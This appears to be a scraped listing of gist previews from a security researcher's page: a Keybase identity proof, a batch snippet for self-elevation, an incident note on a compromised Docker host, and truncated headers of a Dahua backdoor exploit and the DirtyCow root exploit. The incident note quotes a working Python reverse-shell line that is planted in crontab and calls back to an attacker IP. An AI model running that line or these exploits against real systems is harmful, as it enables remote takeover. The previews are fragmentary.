I hereby claim:
- I am jm33-m0 on github.
- I am jm33_m0 (https://keybase.io/jm33_m0) on keybase.
- I have a public key whose fingerprint is CE45 59C1 DC1C D530 9CD5 AA93 43B6 3A9B 7369 0B57
To claim this, I am signing this object:
@echo off | |
:: Check privileges | |
net file 1>NUL 2>NUL | |
if not '%errorlevel%' == '0' ( | |
powershell Start-Process -FilePath "%0" -ArgumentList "%cd%" -verb runas >NUL 2>&1 | |
exit /b | |
) | |
:: Change directory with passed argument. Processes started with | |
:: "runas" start with forced C:\Windows\System32 workdir |
A server with public IPv4 was running a Docker server with infiltered control port (2375) | |
From log, Attacker started a container based on Ubuntu. | |
Logs for this container only show this command: | |
echo -e \"* * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"211.149.215.17\\\",1496));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\\n\" >> /mnt/etc/crontab | |
Host /etc/crontab actually shows the command | |
Binary replaced: | |
* /bin/ps | |
* /bin/netstat | |
* /bin/ssh | |
New files: |
#!/usr/bin/python2.7 | |
# | |
# Dahua backdoor Generation 2 and 3 | |
# Author: bashis <mcw noemail eu> March 2017 | |
# | |
# Credentials: No credentials needed (Anonymous) | |
#Jacked from git history | |
# | |
import string |
/* | |
* (un)comment correct payload first (x86 or x64)! | |
* | |
* $ gcc cowroot.c -o cowroot -pthread | |
* $ ./cowroot | |
* DirtyCow root privilege escalation | |
* Backing up /usr/bin/passwd.. to /tmp/bak | |
* Size of binary: 57048 | |
* Racing, this may take a while.. | |
* /usr/bin/passwd overwritten |
I hereby claim:
To claim this, I am signing this object: